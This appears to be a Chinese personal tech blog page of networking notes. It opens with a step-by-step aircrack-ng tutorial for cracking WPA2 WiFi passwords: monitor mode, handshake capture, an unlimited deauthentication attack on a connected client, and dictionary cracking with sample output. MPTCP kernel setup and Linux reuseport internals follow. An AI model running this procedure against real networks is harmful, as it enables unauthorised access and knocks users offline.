kk Blog —— 通用基础


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp

aircrack-ng 破解WIFI密码

  • 限制条件:监听时需要有用户成功连接WIFI

https://github.com/conwnet/wpa-dictionary

安装 aircrack-ng

1

sudo apt install aircrack-ng

查看可用的无线网卡

1

sudo airmon-ng

指定无线网卡开启监听模式

1

sudo airmon-ng start wlp8s0

开启后名字是 wlp8s0mon

开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式。

扫描附近的无线网络

1
2
3
4
5
6
7

$ sudo airodump-ng wlp8s0mon
CH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49              

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 22:47:DA:62:2A:F0  -50       51       12    0   6  54e. WPA2 CCMP   PSK  AndroidAP    
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  
 22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -31    0 -24e     0       16

这一步会输出两个列表,两个列表不停在刷新。

第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:

1
2
3
4
5

BSSID: 无线 AP 的硬件地址
PWR: 信号强度,值是负数,绝对值越小表示信号越强
CH: 无线网络信道
ENC: 加密方式,我们要破解的是 WPA2
ESSID: 无线网络的名称

第二个列表表示某个无线网络中和用户设备的连接信息:

1
2

BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址

扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出。

使用参数过滤扫描列表,确定扫描目标

1
2
3
4
5
6
7
8
9
10

使用命令:airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>

sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp8s0mon


CH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 ][ WPA handshake: 22:47:DA:62:2A:F0
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 22:47:DA:62:2A:F0  -33 100     1597      387   11   6  54e. WPA2 CCMP   PSK  AndroidAP
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -32    1e-24e  1691     2657

刚扫描时看到输出的扫描状态是这样的:CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49

只有当扫描状态后面出现 ][ WPA handshake: 22:47:DA:62:2A:F0 后,我们才拿到拿到进行破解的握手包。

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。

所以我们可以同时使用 aireplay-ng 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。

拿到握手包后按 Ctrl-C 结束扫描即可。

使用 aireplay-ng 对目标设备发起攻击

1
2
3
4
5
6
7
8

使用命令:aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>

$ sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp8s0mon
18:57:31  Waiting for beacon frame (BSSID: 22:47:DA:62:2A:F0) on channel 6
18:57:32  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [41|64 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [19|121 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [11|80 ACKs]
...

发起攻击后,当 airodump-ng 成功拿到了握手包,使用 Ctrl-C 退出攻击。

使用 aircrack-ng 暴力破解 Wi-Fi 密码

破解是本地操作,无需网络。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

$ aircrack-ng -w wpa-dictionary/common.txt android-01.cap 
Opening android-01.cap
Read 675 packets.

   #  BSSID              ESSID                     Encryption

   1  22:47:DA:62:2A:F0  AndroidAP                 WPA (1 handshake)

Choosing first network as target.

Opening android-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:00:00] 12/2492 keys tested (828.33 k/s) 

      Time left: 2 seconds                                       0.48%

                          KEY FOUND! [ 1234567890 ]


      Master Key     : A8 70 17 C2 C4 94 12 99 98 4B BB BE 41 23 5C 0D 
                       4A 3D 62 55 85 64 B2 10 11 79 6C 41 1A A2 3B D3 

      Transient Key  : 58 9D 0D 25 26 81 A9 8E A8 24 AB 1F 40 1A D9 ED 
                       EE 10 17 75 F9 F1 01 EE E3 22 A5 09 54 A8 1D E7 
                       28 76 8A 6C 9E FC D3 59 22 B7 82 4E C8 19 62 D9 
                       F3 12 A0 1D E9 A4 7C 4B 85 AF 26 C5 BA 22 42 9A 

      EAPOL HMAC     : 22 C1 BD A7 BB F4 12 A5 92 F6 30 5C F5 D4 EE BE

无线网卡退出监听模式

1

sudo airmon-ng stop wlp8s0mon

MPTCP 使用

编译

https://github.com/abcdxyzk/mptcp-v0.95

https://github.com/abcdxyzk/ubuntu-mptcp-v0.95

.config 配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

diff --git a/.config b/.config
index cf146c1c..f5be3370 100644
--- a/.config
+++ b/.config
@@ -1054,6 +1054,11 @@ CONFIG_TCP_CONG_ILLINOIS=m
 CONFIG_TCP_CONG_DCTCP=m
 CONFIG_TCP_CONG_CDG=m
 CONFIG_TCP_CONG_BBR=m
+CONFIG_TCP_CONG_LIA=m
+CONFIG_TCP_CONG_OLIA=m
+CONFIG_TCP_CONG_WVEGAS=m
+CONFIG_TCP_CONG_BALIA=m
+# CONFIG_TCP_CONG_MCTCPDESYNC is not set
 CONFIG_DEFAULT_CUBIC=y
 # CONFIG_DEFAULT_RENO is not set
 CONFIG_DEFAULT_TCP_CONG="cubic"
@@ -1090,6 +1095,21 @@ CONFIG_IPV6_PIMSM_V2=y
 CONFIG_IPV6_SEG6_LWTUNNEL=y
 CONFIG_IPV6_SEG6_HMAC=y
 CONFIG_NETLABEL=y
+CONFIG_MPTCP=y
+CONFIG_MPTCP_PM_ADVANCED=y
+CONFIG_MPTCP_FULLMESH=y
+CONFIG_MPTCP_NDIFFPORTS=m
+CONFIG_MPTCP_BINDER=m
+# CONFIG_MPTCP_NETLINK is not set
+CONFIG_DEFAULT_FULLMESH=y
+# CONFIG_DEFAULT_DUMMY is not set
+CONFIG_DEFAULT_MPTCP_PM="fullmesh"
+CONFIG_MPTCP_SCHED_ADVANCED=y
+# CONFIG_MPTCP_BLEST is not set
+CONFIG_MPTCP_ROUNDROBIN=m
+CONFIG_MPTCP_REDUNDANT=m
+CONFIG_DEFAULT_SCHEDULER=y
+CONFIG_DEFAULT_MPTCP_SCHED="default"
 CONFIG_NETWORK_SECMARK=y
 CONFIG_NET_PTP_CLASSIFY=y
 CONFIG_NETWORK_PHY_TIMESTAMPING=y

https://www.cnblogs.com/fenglt/p/8570343.html

路由配置

enp0s9: 192.168.2.5 gw 192.168.2.4

enp0s10: 192.168.3.5 gw 192.168.3.4

1
2
3
4
5
6
7

ip rule add table 1 from 192.168.2.5
ip route add 192.168.2.0/24 dev enp0s9 scope link table 1
ip route add default via 192.168.2.4 dev enp0s9 table 1

ip rule add table 2 from 192.168.3.5
ip route add 192.168.3.0/24 dev enp0s10 scope link table 2
ip route add default via 192.168.3.4 dev enp0s10 table 2

fullmesh, ndiffports, binder, netlink

工具

sudo apt-get install bison flex

https://github.com/abcdxyzk/iproute-mptcp

./configure

make

./ip/ip link set dev enp0s3 multipath off/on/backup

off命令是在MPTCP层面上的,并不是完全关闭该接口,而是控制MPTCP不去试图使用该网卡,换言之,当路由表指向该接口时,该接口还是会被使用的。

backup命令就是将该接口设置为backup模式,并且会通过PRIO option通知对方,两边会标记low_prio、rcv_low_prio。但目前所有pm都没有用到low_prio。

https://www.cnblogs.com/zhuting/p/5828988.html

http://multipath-tcp.org/pmwiki.php/Users/ConfigureMPTCP

参数

net.mptcp.mptcp_enabled

顾名思义,该变量控制MPTCP开关,实现MPTCP与传统TCP之间的切换。变量值为0或1(默认为1)。

net.mptcp.mptcp_checksum

该变量控制MPTCP传输层中数据序列号校验和(DSS-checksum)的开关,DSS-checksum主要和传输的可靠性相关,只要通信对端中有一端开启,就会执行。变量值为0或1(默认为1)。

net.mptcp.mptcp_syn_retries

设置SYN的重传次数。SYN里包含了MP_CAPABLE-option字段,通过该控制变量,SYN将不会包含MP_CAPABLE-option字段,这是为了处理会丢弃含有未知TCP选项的SYN的网络中间件。变量默认值为3。

net.mptcp.mptcp_debug

调试MPTCP,控制是否打印debug报告文件。

net.mptcp.mptcp_path_manager

MPTCP路径管理,有四个不同的配置值,分别是 default/fullmesh/ndiffports/binder。default/ndiffports/fullmesh分别选择单路、多路或者全路进行传输。其中单路是指跟传统TCP状态一样还是用单一的TCP子流进行传输,多路是当前所有TCP子流中用户选择x条子流数进行传输,全路是指将当前所有可用的TCP子流应用到网络传输中。而binder参考了文献 Binder: a system to aggregate multiple internet gateways in community networks。

fix: default=fullmesh

net.mptcp.mptcp_scheduler

MPTCP子流调度策略,有default/roundrobin两个选项。default优先选择RTT较低的子流直到拥塞窗口满,roundrobin采用轮询策略。

https://www.cnblogs.com/lxgeek/p/4187164.html

MPTCP 理解

MPTCP允许在一条TCP链路中建立多个子通道。当一条通道按照三次握手的方式建立起来后,可以按照三次握手的 方式建立其他的子通道,这些通道以三次握手建立连接和四次握手解除连接。这些通道都会绑定于MPTCP session, 发送端的数据可以选择其中一条通道进行传输。

MPTCP的设计遵守以下两个原则:

1.应用程序的兼容性,应用程序只要可以运行在TCP环境下,就可以在没有任何修改的情况下,运行于MPTCP环境。

2.网络的兼容性,MPTCP兼容其他协议。

MPTCP在协议栈中的位置如下所示:

建立连接过程

如上图所示:MPTCP的第一个子通道的建立遵守TCP的三次握手,唯一的区别是每次发送的 报文段需要添加MP_CAPABLE的的TCP选项和一个安全用途的key。而下图是建立其他的子通道:

如上图所示:第二条子通道的建立依然遵守TCP的三次握手,而TCP选项换成了MP_JOIN。 而token是基于key的一个hash值,rand为一个随机数,而HMAC是基于rand的一个hash值。

数据的发送和接收

MPTCP可以选择多条子通道中任意一条来发送数据。MPTCP如果使用传统的TCP的方式 来发送数据,将会出现一部分包在一条子通道,而另一部分包在另外一条子通道。这样的话,防火墙等 中间设备将会收到TCP的序号跳跃的包,因此将会发生丢包等异常情况。为了解决这个问题,MPTCP通过 增加DSN(data sequence number)来管理包的发送,DSN统计总的报文段序号,而每个子通道中的 序号始终是连续。

MPTCP的接收包过程分为两个阶段:第一、每个子通道依据自身序号来重组报文段;第二、MPTCP 的控制模块依据DSN对所有子通道的报文段进行重组。

拥塞控制

MPTCP中拥塞控制的设计需遵守以下两个原则:

第一:MPTCP和传统TCP应该拥有相同的吞吐量,而不是MPTCP中每一条子通道和传统TCP具有相同的吞吐量。

第二:MPTCP在选择子通道的时候应该选择拥塞情况更好的子通道。

MPTCP的实现

MPTCP的实现主要分为三部分:

master subsocket

Multi-path control bock(mpcb)

slave subsocket

master subsock是一个标准的sock结构体用于TCP通信。mpcb提供开启或关闭子通道、 选择发送数据的子通道以及重组报文段的功能。slave subsocket对应用程序并不可见,他们 都是被mpcb管理并用于发送数据。

reuseport使用

http://www.it165.net/os/html/201605/17066.html

Q&A

Q1:什么是reuseport?

A1:reuseport是一种套接字复用机制,它允许你将多个套接字bind在同一个IP地址/端口对上,这样一来,就可以建立多个服务来接受到同一个端口的连接。

Q2:当来了一个连接时,系统怎么决定到底是哪个套接字来处理它?

A2:对于不同的内核,处理机制是不一样的,总的说来,reuseport分为两种模式,即热备份模式和负载均衡模式,在早期的内核版本中,即便是加入对reuseport选项的支持,也仅仅为热备份模式,而在3.9内核之后,则全部改为了负载均衡模式,两种模式没有共存

Q3:什么是热备份模式和负载均衡模式呢?

A3: 热备份模式:即你创建了N个reuseport的套接字,然而工作的只有一个,其它的作为备份,只有当前一个套接字不再可用的时候,才会由后一个来取代,其投入工作的顺序取决于实现。

负载均衡模式:即你创建的所有N个reuseport的套接字均可以同时工作,当连接到来的时候,系统会取一个套接字来处理它。这样就可以达到负载均衡的目的,降低某一个服务的压力。

Q4:到底怎么取套接字呢?

A4:这个对于热备份模式和负载均衡模式是不同的。

热备份模式:一般而言,会将所有的reuseport同一个IP地址/端口的套接字挂在一个链表上,取第一个即可,如果该套接字挂了,它会被从链表删除,然后第二个便会成为第一个。

负载均衡模式:和热备份模式一样,所有reuseport同一个IP地址/端口的套接字会挂在一个链表上,你也可以认为是一个数组,这样会更加方便,当有连接到来时,用数据包的源IP/源端口作为一个HASH函数的输入,将结果对reuseport套接字数量取模,得到一个索引,该索引指示的数组位置对应的套接字便是工作套接字。

关于REUSEPORT的实现

Linux 4.5/4.6所谓的对reuseport的优化主要体现在查询速度上,在优化前,在HASH冲突链表上遍历所有的套接字之后才能知道到底取哪个(基于一种冒泡的score打分机制,不完成一轮冒泡遍历,不能确定谁的score最高),之所以如此低效是因为内核将reuseport的所有套接字和其它套接字混合在了一起,查找是平坦的,正常的做法应该是将它们分为一个组,进行分层查找,先找到这个组(这个很容易),然后再在组中找具体的套接字。Linux 4.5针对UDP做了上述优化,而Linux 4.6则将这个优化引入到了TCP。

设想系统中一共有10000个套接字被HASH到同一个冲突链表,其中9950个是reuseport的同一组套接字,如果按照老的算法,需要遍历10000个套接字,如果使用基于分组的算法,最多只需要遍历51个套接字即可,找到那个组之后,一步HASH就可以找到目标套接字的索引!

Linux 4.5之前的reuseport查找实现(4.3内核)

以下是未优化前的Linux 4.3内核的实现,可见是多么地不直观。它采用了遍历HASH冲突链表的方式进行reuseport套接字的精确定位:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

result = NULL;
badness = 0;
udp_portaddr_for_each_entry_rcu(sk, node, &hslot2->head) {
	score = compute_score2(sk, net, saddr, sport, daddr, hnum, dif);
	if (score > badness) { // 冒泡排序
		// 找到了更加合适的socket,需要重新hash
		result = sk;
		badness = score;
		reuseport = sk->sk_reuseport;
		if (reuseport) {
			hash = udp_ehashfn(net, daddr, hnum, saddr, sport);
			matches = 1;
		}
	} else if (score == badness && reuseport) { // reuseport套接字散列定位
		// 找到了同样reuseport的socket,进行定位
		matches++;
		if (reciprocal_scale(hash, matches) == 0)
			result = sk;
		hash = next_pseudo_random32(hash);
	}
}

之所以要遍历是因为所有的reuseport套接字和其它的套接字都被平坦地插入到同一个表中,事先并不知道有多少组reuseport套接字以及每一组中有多少个套接字

Linux 4.5(针对UDP)/4.6(针对TCP)的reuseport查找实现

我们来看看在4.5和4.6内核中对于reuseport的查找增加了一些什么神奇的新东西:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

result = NULL;
badness = 0;
udp_portaddr_for_each_entry_rcu(sk, node, &hslot2->head) {
	score = compute_score2(sk, net, saddr, sport, daddr, hnum, dif);
	if (score > badness) {
		// 在reuseport情形下,意味着找到了更加合适的socket组,需要重新hash
		result = sk;
		badness = score;
		reuseport = sk->sk_reuseport;
		if (reuseport) {
			hash = udp_ehashfn(net, daddr, hnum, saddr, sport);
			if (select_ok) {
				struct sock *sk2;
				// 找到了一个组,接着进行组内hash。
				sk2 = reuseport_select_sock(sk, hash, skb, sizeof(struct udphdr));
				if (sk2) {
					result = sk2;
					select_ok = false;
					goto found;
				}
			}
			matches = 1;
		}
	} else if (score == badness && reuseport) {
		// 这个else if分支的期待是,在分层查找不适用的时候,寻找更加匹配的reuseport组,注意4.5/4.6以后直接寻找的是一个reuseport组。
		// 在某种意义上,这回退到了4.5之前的算法。
		matches++;
		if (reciprocal_scale(hash, matches) == 0)
			result = sk;
		hash = next_pseudo_random32(hash);
	}
}

我们着重看一下reuseport_select_sock,这个函数是第二层组内查找的关键,其实不应该叫做查找,而应该叫做定位更加合适:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

struct sock *reuseport_select_sock(struct sock *sk, u32 hash, struct sk_buff *skb, int hdr_len)
{
	...
	prog = rcu_dereference(reuse->prog);
	socks = READ_ONCE(reuse->num_socks);
	if (likely(socks)) {
		/* paired with smp_wmb() in reuseport_add_sock() */
		smp_rmb();
 
		if (prog && skb) // 可以用BPF来从用户态注入自己的定位逻辑,更好实现基于策略的负载均衡
			sk2 = run_bpf(reuse, socks, prog, skb, hdr_len);
		else
			// reciprocal_scale简单地将结果限制在了[0,socks)这个区间内
			sk2 = reuse->socks[reciprocal_scale(hash, socks)];
	}
	...
}